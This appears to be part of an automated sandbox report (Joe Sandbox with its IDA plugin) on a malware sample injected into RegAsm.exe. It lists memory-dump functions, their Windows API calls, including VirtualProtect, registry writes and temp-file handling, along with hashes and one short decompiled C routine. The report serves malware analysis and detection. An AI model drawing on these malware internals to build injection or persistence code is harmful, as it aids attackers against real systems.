RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F05733
GetSystemTimeAsFileTime.KERNEL32(?), ref: 03F05744
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03F057AF
InterlockedIncrement.KERNEL32(03F2C33C), ref: 03F057C6

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 565e1abd628151a382212e2fc5c1ee37a427248a81089e8f6e99bdad747e8d56
Instruction ID: 4eb29f1e1ecfc3e2ee2153274b85afd53273403eff8d33250cf13301a54e78d3
Opcode Fuzzy Hash: 565e1abd628151a382212e2fc5c1ee37a427248a81089e8f6e99bdad747e8d56
Instruction Fuzzy Hash: 27318D36A0431ADBCB21DF5CD88492EBBB8FB59321B140A29E899C3294D770DC15EFD1

Uniqueness

Uniqueness Score: -1.00%

Function 03F02FBB, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

DeleteFileA.KERNEL32(00000000,000004D2), ref: 03F02FDE
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03F02FE7
GetLastError.KERNEL32 ref: 03F02FF1
HeapFree.KERNEL32(00000000,00000000), ref: 03F030B0

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID:
API String ID: 3543646443-0
Opcode ID: 568f0ea544ddd38a8ed9830ff0152972cbcf4b355b0e403e985674e84f79f308
Instruction ID: c4cb7d8a45f4ce7351112c9fbb21008dc9f3d447cb262856cea195ba91b3ad76
Opcode Fuzzy Hash: 568f0ea544ddd38a8ed9830ff0152972cbcf4b355b0e403e985674e84f79f308
Instruction Fuzzy Hash: 2A21C5BB602628EBC220FBE4EC79E8A379CDF56341F044162F651CB194D638D502D7B4

Uniqueness

Uniqueness Score: -1.00%

Function 03F0CB10, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03F12392: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,03F148E5,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1239E
Part of subcall function 03F12392: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 03F123B4
Part of subcall function 03F12392: _snwprintf.NTDLL ref: 03F123D9
Part of subcall function 03F12392: CreateFileMappingW.KERNEL32(000000FF,03F2C1A8,00000004,00000000,00001000,?), ref: 03F123F5
Part of subcall function 03F12392: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03F12407
Part of subcall function 03F12392: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 03F1243F

UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,03F148E5,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F0CB4B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F0CB54
SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,03F148E5,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F0CB9B
GetLastError.KERNEL32(03F16B58,00000000,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F0CBCA
CloseHandle.KERNEL32(00000000,03F16B58,00000000,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F0CBDA

Part of subcall function 03F23345: lstrlenW.KERNEL32(?,?,00000000,74E04D40,?,?,03F0874D,?,74E04D40), ref: 03F23351
Part of subcall function 03F23345: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,03F0874D,?,74E04D40), ref: 03F23379
Part of subcall function 03F23345: memset.NTDLL ref: 03F2338B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: b9ee2dd3b922b911535a8bfa746d054784bfd64a8691f1bdf35bc0c2159e4c06
Instruction ID: 79029758a9eb12eeaa309a09200a24e6ee47dda919b5a7d3337338a29c3a6f63
Opcode Fuzzy Hash: b9ee2dd3b922b911535a8bfa746d054784bfd64a8691f1bdf35bc0c2159e4c06
Instruction Fuzzy Hash: 9F218775640309EFEB21EB78DC55B5A77E8EF14310F080665E905DB2A0EB70E904EB64

Uniqueness

Uniqueness Score: -1.00%

Function 03F083D6, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(03F0AAC3,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,03F13704,00000000,?,?), ref: 03F083F4
GetFileSize.KERNEL32(00000000,00000000,?,?,03F13704,00000000,?,?,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F08404
ReadFile.KERNEL32(03F0AAC3,00000000,00000000,00000000,00000000,00000001,?,?,03F13704,00000000,?,?,?,00000000,-00000007,03F1A023), ref: 03F08430
GetLastError.KERNEL32(?,?,03F13704,00000000,?,?,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F08455
CloseHandle.KERNEL32(000000FF,?,?,03F13704,00000000,?,?,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F08466

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: b0ed4967af265fd740525f473c5b3258888dc12a43709aba92d94f7c3eb0c562
Instruction ID: 963ce328aaf2b6de91049f8b8feb3bd8ba570841146dd4dc8131068be86ef5f7
Opcode Fuzzy Hash: b0ed4967af265fd740525f473c5b3258888dc12a43709aba92d94f7c3eb0c562
Instruction Fuzzy Hash: 3311A276900259EFDF30EF6CDC88EAEBA6DAB453D0F058525F916EB1D0D6709C40A660

Uniqueness

Uniqueness Score: -1.00%

Function 03F10B71, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 03F10B82
StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 03F10B9B
StrTrimA.SHLWAPI(?,?), ref: 03F10BC3
StrTrimA.SHLWAPI(00000000,?), ref: 03F10BD2
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 03F10C09

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 83d629ef3ea9fa8d166047cb995bdf76ad4339c57800f05b5609745fda6bd9b1
Instruction ID: f1f24c2c205b063bf6388d4a6c4d8325f40dba7423a656736bac0c1fe8c68971
Opcode Fuzzy Hash: 83d629ef3ea9fa8d166047cb995bdf76ad4339c57800f05b5609745fda6bd9b1
Instruction Fuzzy Hash: 0D11933664020BFBD721EA59EC94FAB7BADEB54794F140021FA04DB240DFB0D8918B90

Uniqueness

Uniqueness Score: -1.00%

Function 03F030C0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,0047B5A8,00000000,03F090F9,?,?,?,03F1BDB6,74E05520,?,03F0B57C,00000000,00000000), ref: 03F030F7
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,03F1BDB6,74E05520,?,03F0B57C,00000000,00000000,?,00000000,03F090F9,00000000), ref: 03F03127
RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F03136
RtlLeaveCriticalSection.NTDLL(03F2C300), ref: 03F03154
GetLastError.KERNEL32(?,03F1BDB6,74E05520,?,03F0B57C,00000000,00000000,?,00000000,03F090F9,00000000), ref: 03F03164

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: f1485036c2f08d33276a32ad6a2602f93534c2d9ae298483f38ea3fad249b3a5
Instruction ID: ff5bd2257e37ee9f595d4ca7a0d34bd330c1fb53f9642c0ec0c2e2efc2699ed1
Opcode Fuzzy Hash: f1485036c2f08d33276a32ad6a2602f93534c2d9ae298483f38ea3fad249b3a5
Instruction Fuzzy Hash: DF21F8B9A00B06EFC720DFA9C98495ABBF8FF08310B008529EA55D7750D770F904DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C85A, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 03F1C888
GetLastError.KERNEL32 ref: 03F1C8AB
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F1C8BE
GetLastError.KERNEL32 ref: 03F1C8C9
HeapFree.KERNEL32(00000000,00000000), ref: 03F1C911

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 3f1f06ae643950186b85b8d9faaedcb39d509776f9560b2ed055ae7b3620ef36
Instruction ID: 46f55105914b44c30faf2736c21f1b508a92f93e35840d783ba3c3be73c4638d
Opcode Fuzzy Hash: 3f1f06ae643950186b85b8d9faaedcb39d509776f9560b2ed055ae7b3620ef36
Instruction Fuzzy Hash: 1021AE31940349EBEB31DB94E98CB5E7BB8EB11325F640468E552E61E0C3B1EDA4DB10

Uniqueness

Uniqueness Score: -1.00%

Function 03F101CC, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 03F101E0
memcpy.NTDLL(00000000,03F1EC23,?,?,-00000005,?,03F1EC23,00000001,00000000,-00000005,00000001), ref: 03F10209
RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,?), ref: 03F10232
RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,00000000,-00000005,?,03F1EC23,00000001,00000000,-00000005,00000001), ref: 03F10252
RegCloseKey.ADVAPI32(?,?,03F1EC23,00000001,00000000,-00000005,00000001), ref: 03F1025D

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: bc2e1a80c09c83e95493b661753ef1c38010bbc1c048db9f3cad32b868ab08f4
Instruction ID: c803c84959b8c09cb0c62bde0ac5da4d02392bca5eda99e7703532b1a27e055b
Opcode Fuzzy Hash: bc2e1a80c09c83e95493b661753ef1c38010bbc1c048db9f3cad32b868ab08f4
Instruction Fuzzy Hash: 6311AC3650020AFBDF22AE68BC45EBAB76DFB58351F040025FE05E62A4DA318C709A61

Uniqueness

Uniqueness Score: -1.00%

Function 03F2185C, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(03F01281,?,?,?,?,00000008,03F01281,00000000,?,?,03F1B2AE,?,?,00000000,03F148DE,00000000), ref: 03F21879
memcpy.NTDLL(03F01281,?,00000009,?,?,?,?,00000008,03F01281,00000000,?,?,03F1B2AE,?,?,00000000), ref: 03F2189B
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 03F218B3
lstrlenW.KERNEL32(00000000,00000001,03F01281,?,?,?,?,?,?,?,00000008,03F01281,00000000,?,?,03F1B2AE), ref: 03F218D3
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,03F01281,00000000,?), ref: 03F218F8

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: f5619a74b4d0b2c645c02b48123585ab7887cbd0b0a8156f5c20eb86943f59e2
Instruction ID: eb649c6be1c494582ba709ab3b81ed64ec93d4159780035b7d4f2c34eb33638c
Opcode Fuzzy Hash: f5619a74b4d0b2c645c02b48123585ab7887cbd0b0a8156f5c20eb86943f59e2
Instruction Fuzzy Hash: 0B117C3AD0030DFBCB20EBA5EC59F9E7FB8EB18311F044021F919E6290DA749648DB64

Uniqueness

Uniqueness Score: -1.00%

Function 03F04781, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,?), ref: 03F047B0
RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F047BD
RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F047D0
lstrcmpi.KERNEL32(03F2C340,00000000), ref: 03F047F0
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03F0438B,00000000), ref: 03F04804

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID:
API String ID: 1266740956-0
Opcode ID: b1ca061de869dd9e420c6617bbf1e67f1b8c15e90ad288b22db7c23874472f94
Instruction ID: 49a3496cd3ad05abc833eeccb76743839adfc12480bbd80fcd9a5cec62302e4f
Opcode Fuzzy Hash: b1ca061de869dd9e420c6617bbf1e67f1b8c15e90ad288b22db7c23874472f94
Instruction Fuzzy Hash: 6911A93290021AEFCB24DB5DD998E9DBBF8FF18321B084429E909D3290D774AD059BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0888A, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,03F0EA9C,00000000,?,00000000,74E05520,00000000,?,03F0C8DA,?,?,?,00000000), ref: 03F08894

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

lstrcpy.KERNEL32(00000000,00000000), ref: 03F088B8
StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,03F0C8DA,?,?,?,00000000,?,00000000,00000000), ref: 03F088BF
lstrcpy.KERNEL32(00000000,?), ref: 03F08907
lstrcat.KERNEL32(00000000,?), ref: 03F08916

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: af555fccf7ecbc08e40679df62b5d3aa9c13c1c1874293d865554b6dd74ae8c2
Instruction ID: cf7cd541d3a91a41c1cbf35d3b749479eb5386079a99c3f42fc995f76aecb25d
Opcode Fuzzy Hash: af555fccf7ecbc08e40679df62b5d3aa9c13c1c1874293d865554b6dd74ae8c2
Instruction Fuzzy Hash: E111C23660030AEBD730EA69DC88F3BBBECAB94784F080129F545C3145DB34D805D721

Uniqueness

Uniqueness Score: -1.00%

Function 03F17E47, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F03288: lstrlen.KERNEL32(?,?,?,?,03F0AA7F,00000000,00000000,?,?), ref: 03F03294

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 03F17E70
memcpy.NTDLL(00000000,?,?), ref: 03F17E83
RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F17E94
RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F17EA9
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 03F17EE1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 45ebb6e328d90797bd7faa2c4dcc89ae436e6e0dcc58fa59ecbb040924359c7b
Instruction ID: 1ddc1123a5efe49159cc5c2cd66161fc5be57bb1c234cfc36f287f79ce6772d5
Opcode Fuzzy Hash: 45ebb6e328d90797bd7faa2c4dcc89ae436e6e0dcc58fa59ecbb040924359c7b
Instruction Fuzzy Hash: E711A07A501215EFC731EF18AC84C2F7BA8EB95322705053AF81993254CA755C199BA5

Uniqueness

Uniqueness Score: -1.00%

Function 03F0B760, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?,?,03F10A31,?,?,00000000), ref: 03F0B776
lstrlen.KERNEL32(?,?,03F10A31,?,?,00000000), ref: 03F0B77D
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 03F0B78B

Part of subcall function 03F0F264: GetLocalTime.KERNEL32(?,?,?,?,?,03F04E92,00000000,00000001), ref: 03F0F26E
Part of subcall function 03F0F264: wsprintfA.USER32 ref: 03F0F2A1

wsprintfA.USER32 ref: 03F0B7AD

Part of subcall function 03F222CB: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,03F0B7D5,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 03F222E9
Part of subcall function 03F222CB: wsprintfA.USER32 ref: 03F2230E

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 03F0B7DE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID:
API String ID: 3847261958-0
Opcode ID: f51741bfcc443addc5b858050e572636cd92ff922ed362f626c0843edb2c71b2
Instruction ID: f2e704f85c9dab12f021baccb9839929a464ddd5eb00ac4e8b5a230b4f0c1d4f
Opcode Fuzzy Hash: f51741bfcc443addc5b858050e572636cd92ff922ed362f626c0843edb2c71b2
Instruction Fuzzy Hash: 5A01843650021CFBDB21AF6ADC44D9A7F2EFF94364B044021FD1896264D6769D51EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0B3DA, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 03F0B3F1

Part of subcall function 03F190A0: wcstombs.NTDLL ref: 03F1915E

lstrlen.KERNEL32(?,?,?,?,?,03F14EBF,?,?), ref: 03F0B414
lstrlen.KERNEL32(?,?,?,?,03F14EBF,?,?), ref: 03F0B41E
memcpy.NTDLL(?,?,00004000,?,?,03F14EBF,?,?), ref: 03F0B42F
HeapFree.KERNEL32(00000000,?,?,?,?,03F14EBF,?,?), ref: 03F0B451

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID:
API String ID: 1256246205-0
Opcode ID: b74a4902c59401ba3e0fb09edace6f5f7bfec711f8217d92268b70b5a729fd8c
Instruction ID: 30585b73f2a8572a54f0fda5ea387467428a10858f206fb53d19c9fad787edb7
Opcode Fuzzy Hash: b74a4902c59401ba3e0fb09edace6f5f7bfec711f8217d92268b70b5a729fd8c
Instruction Fuzzy Hash: 1D11527A900208EFCB21EF55DC44F5ABBB9EB95350F144064E905D72A0D771DE10EB54

Uniqueness

Uniqueness Score: -1.00%

Function 03F06716, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F1182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,03F136F0,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F1183A
Part of subcall function 03F1182B: mbstowcs.NTDLL ref: 03F11856

lstrlenW.KERNEL32(00000000,74E5F560,00000000,?,00000000), ref: 03F06742
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F06754
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03F06771
lstrlenW.KERNEL32(00000000), ref: 03F0677D
HeapFree.KERNEL32(00000000,00000000), ref: 03F06791

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID:
API String ID: 3403466626-0
Opcode ID: 1a2532db70a21454ce188eb7e377d74c7a4ae17e391b76ba5a8e6c5b56916d5b
Instruction ID: b23a614a067da3510b496e0131bcd1af976eba858ef3adb01f8b224298cf8fd6
Opcode Fuzzy Hash: 1a2532db70a21454ce188eb7e377d74c7a4ae17e391b76ba5a8e6c5b56916d5b
Instruction Fuzzy Hash: B8019E72100209EFD722FB98EC94F9E77ACEF29311F114015FA05D71A4CBB4AD059BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03F219FF, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03F21A1F
GetModuleHandleA.KERNEL32 ref: 03F21A2D
LoadLibraryExW.KERNEL32(?,?,?), ref: 03F21A3A
GetModuleHandleA.KERNEL32 ref: 03F21A51
GetModuleHandleA.KERNEL32 ref: 03F21A5D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: b45e7df10fdd684265dba6ff90bdf049da3e146afa763d7cd5b55ba2e5a926cd
Instruction ID: 2b319f1f8e15dd7b0689b9a7d0d48b096d9accf33b6a7aa2b73351a09276a74f
Opcode Fuzzy Hash: b45e7df10fdd684265dba6ff90bdf049da3e146afa763d7cd5b55ba2e5a926cd
Instruction Fuzzy Hash: 13014B31A0036ADBDF11EF69EC4195A7FADEB646A07090136ED14C2264DBA18C219F94

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D3F8, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F0D403
RtlLeaveCriticalSection.NTDLL(03F2C300), ref: 03F0D414
VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,03F183FB,03F2B7A0,-0000000C,00000000,03F11C5A,0000000C,00000000,?,0000000C,00000000), ref: 03F0D42B
VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,03F183FB,03F2B7A0,-0000000C,00000000,03F11C5A,0000000C,00000000,?,0000000C,00000000), ref: 03F0D445
GetLastError.KERNEL32(?,?,03F183FB,03F2B7A0,-0000000C,00000000,03F11C5A,0000000C,00000000,?,0000000C,00000000,?), ref: 03F0D452

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 2b91a0c4899d1c4ac92568f8777d971d88176b5afbc4536934a062d7f03968af
Instruction ID: 41b39df9016c000eeee8b2f32b1db1e05063fbe3496ab6a6ac33884576932d2e
Opcode Fuzzy Hash: 2b91a0c4899d1c4ac92568f8777d971d88176b5afbc4536934a062d7f03968af
Instruction Fuzzy Hash: 91018F7A200308EFD720DF59CC40D6AB7B9EF84720B114529EA56D3290D770F901DB24

Uniqueness

Uniqueness Score: -1.00%

Function 03F10E6D, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03F10E7A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 03F10E8A
CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 03F10E93
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,03F147C3,?,?,00000040), ref: 03F10EB1
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,03F147C3,?,?,00000040), ref: 03F10EBE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
String ID:
API String ID: 3667519916-0
Opcode ID: c1fb4cc09f056035a5626ab4c07eccda5da6f16ff4bf7d47fdbb73a73fc09f0b
Instruction ID: 669d318bf232c46c92df270cec0de0c44c123043ac4cdbb7e07aa59c822da45d
Opcode Fuzzy Hash: c1fb4cc09f056035a5626ab4c07eccda5da6f16ff4bf7d47fdbb73a73fc09f0b
Instruction Fuzzy Hash: 41F03A74600706EFDB31EB7AEC58F1BB6A8FF54711F184619F942D25A0CB68E851CA24

Uniqueness

Uniqueness Score: -1.00%

Function 010A25BA, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A25BA(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x10aa2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x10aa2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x10aa2b0 = _t6;
				 *0x10aa2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x10aa2ac = _t7;
				if(_t7 == 0) {
					 *0x10aa2ac =  *0x10aa2ac | 0xffffffff;
				}
				return 0;
			}

0x010a25c2
0x010a25ca
0x010a25cf
0x00000000
0x010a261c
0x010a25d1
0x010a25d9
0x010a2619
0x00000000
0x010a2619
0x010a25db
0x010a25e0
0x010a25f2
0x010a25f7
0x010a25fd
0x010a2605
0x010a260a
0x010a260c
0x010a260c
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,010A1B6F,?,?,?,010A3E60,?), ref: 010A25C2
GetVersion.KERNEL32(?,?,010A3E60,?), ref: 010A25D1
GetCurrentProcessId.KERNEL32(?,?,010A3E60,?), ref: 010A25E0
